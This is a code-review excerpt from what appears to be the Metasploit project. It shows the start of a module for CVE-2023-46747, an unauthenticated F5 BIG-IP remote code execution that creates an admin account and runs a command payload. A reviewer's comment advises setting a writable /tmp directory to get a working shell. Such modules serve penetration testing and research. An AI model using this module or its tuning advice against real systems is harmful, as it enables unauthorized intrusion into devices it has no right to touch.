modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb

```diff
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'F5 BIG-IP TMUI AJP Smuggling RCE',
+        'Description' => %q{
+          This module exploits a flaw in F5's BIG-IP Traffic Management User
+          Interface (TMUI) that enables an external, unauthenticated attacker to
+          create an administrative user. Once the user is created, the module
+          uses the new account to execute a command payload.
+        },
+        'Author' => [
+          'Michael Weber', # vulnerability analysis
+          'Thomas Hendrickson', # vulnerability analysis
+          'Sandeep Singh', # nuclei template
+          'Spencer McIntyre' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-46747'],
+          ['URL', 'https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/'],
+          ['URL', 'https://www.praetorian.com/blog/advisory-f5-big-ip-rce/'],
+          ['URL', 'https://my.f5.com/manage/s/article/K000137353'],
+          ['URL', 'https://github.com/projectdiscovery/nuclei-templates/pull/8496']
+        ],
+        'DisclosureDate' => '2023-10-26', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
```

Comment:
You might already have this in your currently copy of the exploit but just a friendly reminder to add the default writeable directory. I was not getting a shell without it set:
`"commandResult":"/bin/bash: ./zXoawYnLbVUL: Permission denied\n"}`.
```suggestion
          'RPORT' => 443,
          'FETCH_WRITABLE_DIR' => '/tmp'
```